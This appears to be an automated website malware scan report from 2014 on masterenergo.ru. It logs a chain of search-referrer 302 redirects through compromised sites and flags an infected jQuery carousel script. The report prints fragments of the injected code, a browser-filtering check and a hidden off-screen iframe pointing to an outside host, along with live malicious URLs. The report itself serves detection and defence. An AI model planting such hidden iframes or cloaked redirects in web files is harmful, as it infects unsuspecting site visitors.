Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://masterenergo.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: masterenergo.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 16 Jul 2014 11:24:15 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 X-Powered-By: PleskLin | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 16 Jul 2014 11:24:15 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 16 Jul 2014 11:24:15 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.30 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 16 Jul 2014 11:24:16 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://masterenergo.ru/ | 200 OK Content-Length: 77742 Content-Type: text/html | clean |
http://masterenergo.ru/media/system/js/caption.js | 200 OK Content-Length: 2931 Content-Type: text/javascript | clean |
http://code.jquery.com/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://masterenergo.ru/templates/master/js/jquery.jclock.js | 200 OK Content-Length: 8419 Content-Type: text/javascript | clean |
http://masterenergo.ru/templates/master/js/jquery.mousewheel.min.js | 200 OK Content-Length: 3501 Content-Type: text/javascript | clean |
http://masterenergo.ru/templates/master/js/jcarousellite_1.0.1.pack.js | 200 OK Content-Length: 3032 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, Decoded script: (function($){$.fn.jCarouselLite=function(o){o=$.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,beforeStart:null,afterEnd:null},o||{});return this.each(function(){var b=false,animCss=o.vertical?"top":"left",sizeCss=o.vertical?"height":"width";var c=$(this),ul=$("ul",c),tLi=$("li",ul),tl=tLi.size(),v=o.visible;if(o.circular){ul.prepend(tLi.slice(tl-v-1+1).clone()).append(tLi.slice(0,v).clone <iframe src="http://sunigali.billblog.co.uk/quality15.pittaro" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://masterenergo.ru/templates/master/js/myjs.js | 200 OK Content-Length: 3044 Content-Type: text/javascript | clean |
http://205.178.137.101/46tdr2U5.php?id= | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://205.178.137.101/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://masterenergo.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND Content-Length: 40994 Content-Type: text/html | clean |
http://masterenergo.ru/oplata.html | 200 OK Content-Length: 41918 Content-Type: text/html | clean |
http://masterenergo.ru/dostavka.html | 200 OK Content-Length: 40457 Content-Type: text/html | clean |
http://masterenergo.ru/baur/view-all-products.html | 200 OK Content-Length: 46134 Content-Type: text/html | clean |
http://masterenergo.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 59953 Content-Type: text/javascript | clean |
http://masterenergo.ru/chauvin-arnoux/view-all-products.html | 200 OK Content-Length: 48436 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=masterenergo.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://masterenergo.ru/
Result: masterenergo.ru is not infected or malware details are not published yet.
Result: masterenergo.ru is not infected or malware details are not published yet.